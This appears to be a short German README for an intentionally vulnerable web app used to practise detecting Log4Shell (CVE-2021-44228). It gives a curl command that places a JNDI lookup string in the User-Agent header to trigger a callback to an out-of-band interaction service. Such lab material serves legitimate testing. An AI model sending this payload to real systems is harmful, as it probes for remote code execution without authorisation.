
Einfache Webapp, die anfällig für Log4Shell (CVE-2021-44228) ist.
Die Anwendung protokolliert den 'User-Agent'-Header, sodass man die Schwachstelle mit curl und z. B. interactsh-service testen kann:
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
Man sollte eine DNS-Interaktion unter app.interactsh.com sehen.
Link zum Docker Hub